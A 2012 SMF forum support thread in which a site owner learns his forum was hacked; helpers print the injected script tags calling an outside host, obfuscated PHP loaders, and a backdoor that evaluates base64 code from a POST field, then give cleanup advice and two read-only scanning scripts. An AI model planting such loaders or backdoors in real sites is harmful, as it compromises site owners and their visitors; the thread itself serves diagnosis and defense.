Author Topic: Weird indexing issue? Need help  (Read 1987 times)

Offline Alb0

  • Semi-Newbie
  • *
  • Posts: 88
    • !V! Velocity
Weird indexing issue? Need help
« on: April 29, 2012, 11:30:13 PM »
So this just recently started happening with my site, which I have the slightest clue as to why. Whenever you visit my site, www.velocity-server.com , you'll notice that the indexing of the template is weirdly off, looking at the search box. Also the text is enlarged creating an off look to it.
Although, if you refresh the page about 2 times, everything reverts back to normal, and the issue disappears. I haven't downloaded any mods as of late, and I also un-installed the very last mods I implemented, just to be on the safe side, yet the issue still exists.

Any idea as to what it could be?  :(

My forum is currently running on SMF 2.0.2

Offline vbgamer45

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 16,374
    • smfhacks on Facebook
    • VBGAMER45 on GitHub
    • @createaforum on Twitter
    • SMF For Free
Re: Weird indexing issue? Need help
« Reply #1 on: April 29, 2012, 11:34:57 PM »
Your website has been hacked; code was injected into your files.
If you view the source of your webpage, the very first line is:
Code: [Select]
<script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script 
src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head
Community Suite - Take your forum to the next level built for SMF, Gallery,Store,Classfieds,Downloads,more!

SMFHacks.com -  Paid Modifications for SMF

Latest Mod:
EzPortal - Portal System for SMF
Newsletter Pro SMF Gallery Pro SMF Classifieds SMF Store

Offline Alb0

  • Semi-Newbie
  • *
  • Posts: 88
    • !V! Velocity
Re: Weird indexing issue? Need help
« Reply #2 on: April 29, 2012, 11:39:43 PM »
Oh my. Any possible way to extract that, and prevent it from happening again? I'm very limited when it comes to this, so I apologize if I may seem ignorant.
Should I be worried? That sounds serious.

Offline vbgamer45

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 16,374
    • smfhacks on Facebook
    • VBGAMER45 on GitHub
    • @createaforum on Twitter
    • SMF For Free
Re: Weird indexing issue? Need help
« Reply #3 on: April 29, 2012, 11:46:02 PM »
Yeah I would do a backup of your files and database. Then reinstall the SMF files for your forum.
I do recommend deleting the files first before reuploading the SMF files if possible

Offline Alb0

  • Semi-Newbie
  • *
  • Posts: 88
    • !V! Velocity
Re: Weird indexing issue? Need help
« Reply #4 on: April 30, 2012, 12:17:47 AM »
Oh this is gonna be terrible. I backed up my whole database, backed up my whole directory to the forums as well. I tried re-installing SMF, overwriting the files, yet I ran into quite a bit of trouble. Was getting errors left and right. This is sad as my forum is pretty huge with 9k+ posts.

Which files do you recommend deleting first? And did you mean reupload ALL the SMF files? Or just certain ones

Offline vbgamer45

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 16,374
    • smfhacks on Facebook
    • VBGAMER45 on GitHub
    • @createaforum on Twitter
    • SMF For Free
Re: Weird indexing issue? Need help
« Reply #5 on: April 30, 2012, 12:22:19 AM »
I would reupload all the files..

Offline Alb0

  • Semi-Newbie
  • *
  • Posts: 88
    • !V! Velocity
Re: Weird indexing issue? Need help
« Reply #6 on: April 30, 2012, 12:38:35 AM »
So what you're basically saying is a fresh re-install of SMF? That would mean I would have to do everything over, come to mods, custom work, everything? This is a real bummer. As I don't see any other way.

Offline Alb0

  • Semi-Newbie
  • *
  • Posts: 88
    • !V! Velocity
Re: Weird indexing issue? Need help
« Reply #7 on: April 30, 2012, 01:10:19 AM »
This code seems to have been inserted into most of the PHP files, which wasn't there prior.

Quote
$s=substr(8,1);foreach(array(52,123,107,122,97,120,124,40,123,122,107,54,108,103,107,125,101,109,102,124,38,107,103,103,99,97,109,53,42,51,39,100,103,107,105,124,97,103,102,35,96,124,124,120,50,39,39,120,96,125,99,98,97,99,38,107,122,97,58,38,111,103,38,124,96,39,55,122,102,108,53)as$v){$s.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$v^8);}foreach(array(1,6,4,1,9,6,1,1,1,1,8,1)as$k=>$v){$t[$k]=substr($s,0,$v);$s=substr($s,$v);}$d=@$_COOKIE[$t[10]];if(!$d){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].$t[7].$t[12].$t[11].$t[4].$t[10].$t[8].$t[0].$t[9].$t[1].$t[3]);}elseif($d!=1){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].(1).$t[7].$t[8].$t[0].$t[9].$t[1].$t[3].$t[0].$t[1].$t[2].$t[6].$t[7].$s.(1024).urlencode(strrev($d)).$t[7].$t[3].$t[0].$t[9].$t[1].$t[3]);}

Any clue how I could remove that from the PHP files without having to go through each single one?

Offline roqueiro

  • Newbie
  • *
  • Posts: 7
Re: Weird indexing issue? Need help
« Reply #8 on: May 03, 2012, 12:33:43 PM »
I found this:
Quote
$s=substr(8,1);foreach(array(52,123,107,122,97,120,124,40,123,122,107,54,108,103,107,125,101,109,102,124,38,107,103,103,99,97,109,53,42,51,39,100,103,107,105,124,97,103,102,35,96,124,124,120,50,39,39,120,96,125,99,98,97,99,38,107,122,97,58,38,111,103,38,124,96,39,55,122,102,108,53)as$v){$s.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$v^8);}foreach(array(1,6,4,1,9,6,1,1,1,1,8,1)as$k=>$v){$t[$k]=substr($s,0,$v);$s=substr($s,$v);}$d=@$_COOKIE[$t[10]];if(!$d){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].$t[7].$t[12].$t[11].$t[4].$t[10].$t[8].$t[0].$t[9].$t[1].$t[3]);}elseif($d!=1){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].(1).$t[7].$t[8].$t[0].$t[9].$t[1].$t[3].$t[0].$t[1].$t[2].$t[6].$t[7].$s.(1024).urlencode(strrev($d)).$t[7].$t[3].$t[0].$t[9].$t[1].$t[3]);}if(isset($_POST["showimg"])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST["showimg"])));exit;}                                    
                                    $s=substr(8,1);foreach(array(52,123,107,122,97,120,124,40,123,122,107,54,108,103,107,125,101,109,102,124,38,107,103,103,99,97,109,53,42,51,39,100,103,107,105,124,97,103,102,35,96,124,124,120,50,39,39,120,96,125,99,98,97,99,38,107,122,97,58,38,111,103,38,124,96,39,55,122,102,108,53)as$v){$s.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$v^8);}foreach(array(1,6,4,1,9,6,1,1,1,1,8,1)as$k=>$v){$t[$k]=substr($s,0,$v);$s=substr($s,$v);}$d=@$_COOKIE[$t[10]];if(!$d){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].$t[7].$t[12].$t[11].$t[4].$t[10].$t[8].$t[0].$t[9].$t[1].$t[3]);}elseif($d!=1){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].(1).$t[7].$t[8].$t[0].$t[9].$t[1].$t[3].$t[0].$t[1].$t[2].$t[6].$t[7].$s.(1024).urlencode(strrev($d)).$t[7].$t[3].$t[0].$t[9].$t[1].$t[3]);}if(isset($_POST["showimg"])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST["showimg"])));exit;}   

And this:
Quote
                                    global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "hxxp:turnitupnow.net/?rnd= [nonactive]".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

In these files:
Base folder:
index.php
Settings.php

Sources folder:
Admin.php
Aeva-Sites.php
CustomForm.php
Display.php
Load.php
ManageBoards.php
ManageMaintenance.php
ManageSettings.php
ModerationCenter.php
ModSettings.php
PersonalMessage.php
Poll.php
Post.php
Profile-View.php
ScheduledTasks.php
Subs.php
Subs-Aeva.php
Subs-Aeva-Admin.php
Subs-Aeva-Custom-Example.php
Subs-Aeva-Sites.php
Subs-Boards.php
Subs-Editor.php
Subs-Members.php
Subs-Menu.php
Subs-Package.php
Subs-TopicRating.php

Themes\Default folder:
MessageIndex.template.php
TopicRating.template.php

Themes\Default\Language folder:
ManageScheduledTasks.english.php
Modifications.english.php
Modifications.portuguese_brazilian-utf8.php
TopicRating.english.php
TopicRating.russian.php
TopicRating.russian-utf8.php
TopicRating.spanish_es-utf8.php

Themes\Mytheme folder:
MessageIndex.template

IDK how these files have been hacked/modified. The modified date has not been changed.
For security, after correcting the files, change passwords.

Modify reason: Add Themes\Default\Language folder:
« Last Edit: May 03, 2012, 02:12:46 PM by roqueiro »
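
Added example (not part of the original posts): a read-only scanner that walks a forum directory and reports every file containing one of the three injected snippets quoted in this thread, so the infected files can be listed without opening each one. The signature names, the function names and the sample tree are made up for this illustration; the sample payloads are truncated on purpose.

```python
import re
import tempfile
from pathlib import Path

# Fingerprints taken from the injected PHP quoted in this thread; whitespace is
# optional so a re-spaced copy still matches.
SIGNATURES = {
    "xor-loader": re.compile(rb"\$s\s*=\s*substr\(\s*8\s*,\s*1\s*\)\s*;\s*foreach\s*\(\s*array\s*\("),
    "sessdt-loader": re.compile(rb"global\s+\$sessdt_o\b"),
    "post-eval-backdoor": re.compile(
        rb"eval\s*\(\s*base64_decode\s*\(\s*str_replace\s*\(\s*chr\(32\)\s*,\s*chr\(43\)"),
}
SUFFIXES = {".php", ".template"}  # the file list above includes a .template file


def scan_tree(root):
    """Map each matching file (relative path) to the signatures found in it."""
    root, hits = Path(root), {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SUFFIXES:
            continue
        # Read every file: the modified date was reported unchanged, so
        # narrowing the search by mtime would skip infected files.
        data = path.read_bytes()
        found = [name for name, rx in SIGNATURES.items() if rx.search(data)]
        if found:
            hits[path.relative_to(root).as_posix()] = found
    return hits


def build_sample_tree(root):
    """Constructed sample: two infected files (payloads truncated) and one clean."""
    root = Path(root)
    (root / "Sources").mkdir(parents=True, exist_ok=True)
    (root / "index.php").write_text("<?php $s=substr(8,1);foreach(array(52,123)as$v){} ?>\n")
    (root / "Sources" / "Load.php").write_text(
        "<?php global $sessdt_o; eval(base64_decode(str_replace(chr(32),chr(43),$x))); ?>\n")
    (root / "Sources" / "Subs.php").write_text("<?php function ok() { return 1; }\n")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, names in scan_tree(tmp).items():
            print(f"{rel}: {', '.join(names)}")
```

A clean result only means these three snippets are absent; a variant with different variable names would need its own signature.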

Offline thecity

  • Newbie
  • *
  • Posts: 6
Re: Weird indexing issue? Need help
« Reply #9 on: May 06, 2012, 07:56:43 AM »
I know someone using Wordpress, he has exactly the same problem.
All the plugin files are infected with this malicious code.

Warning your host is a good idea. Those ****** russians..
« Last Edit: May 06, 2012, 08:39:57 AM by thecity »

MrPhil

  • Guest
Re: Weird indexing issue? Need help
« Reply #10 on: May 06, 2012, 11:44:50 AM »
Disable your site (put it in maintenance mode) so if the hack contains any drive-by infections, your users have less of a chance of picking up something while you do cleanup. Even better would be to insert an index.html file that just says "Sorry, temporarily closed while cleaning up.".

First, you need to figure out how the hacker got in and plug up those security holes before doing anything else. Work with your host to look at access logs. Check that you aren't granting ridiculous permissions such as 777 all over the place. Scan your PC (used to administer the site and forum) for spyware, password sniffers, and keystroke loggers. Enable the PC firewall and make sure the antivirus scanner is working. Change all the passwords: site account access, SMF Admin, FTP, and even the database if you feel up to it.

Then you either
  • edit the files one by one, or
  • erase all files EXCEPT Settings.php, Settings_bak.php, avatars, and attachments, and either
    • restore all files from a known good backup, or
    • copy in all the files in a "Large Upgrade" to refresh your SMF system, then re-install all mods and custom work

You want to make sure you don't leave any unaccounted-for files lying around, that might be backdoors or Trojans. Most hacks don't involve the database, but keep an eye out for any evidence that has happened (that will be an ugly cleanup job!).
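
Added example (not part of the original posts): one way to check for unaccounted-for files, changed files and world-writable permissions by comparing the live forum directory with an unpacked copy of the same SMF release. It assumes the kept paths sit at the forum root; they are only listed for manual review, since an earlier post in this thread found Settings.php among the infected files. All function names and the sample trees are made up for this illustration.

```python
import hashlib
import os
import stat
from pathlib import Path

# Site-specific paths the post says to keep; no release copy exists to diff against.
KEEP = ("Settings.php", "Settings_bak.php", "avatars/", "attachments/")


def digest(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()


def audit(live_root, clean_root):
    """Compare a live forum tree with a pristine copy of the same release."""
    live_root, clean_root = Path(live_root), Path(clean_root)
    report = {"modified": [], "unaccounted": [], "review_by_hand": [], "world_writable": []}
    for path in sorted(live_root.rglob("*")):
        rel = path.relative_to(live_root).as_posix()
        if path.stat().st_mode & stat.S_IWOTH:  # e.g. 777 or 666
            report["world_writable"].append(rel)
        if not path.is_file():
            continue
        if rel.startswith(KEEP):
            report["review_by_hand"].append(rel)
        elif not (clean_root / rel).is_file():
            report["unaccounted"].append(rel)  # possible backdoor or leftover
        elif digest(path) != digest(clean_root / rel):
            report["modified"].append(rel)  # injected code or a mod's edits
    return report


def build_sample(base):
    """Constructed sample trees: a release copy and a live copy with three problems."""
    files = {
        "clean/index.php": "<?php // release\n",
        "clean/Sources/Subs.php": "<?php // release\n",
        "live/index.php": "<?php /* injected */ // release\n",
        "live/Sources/Subs.php": "<?php // release\n",
        "live/Sources/img.php": "<?php // not in release\n",
        "live/Settings.php": "<?php // site config\n",
    }
    for rel, text in files.items():
        target = Path(base) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(text)
    for p in list(Path(base).rglob("*")):
        os.chmod(p, 0o755 if p.is_dir() else 0o644)
    os.chmod(Path(base) / "live/Sources/Subs.php", 0o777)
    return Path(base) / "live", Path(base) / "clean"
```

Call `audit(live, clean)` with the two directory paths. Files edited by installed mods also appear under `modified`, so that list is a set of files to inspect or replace, not proof of infection.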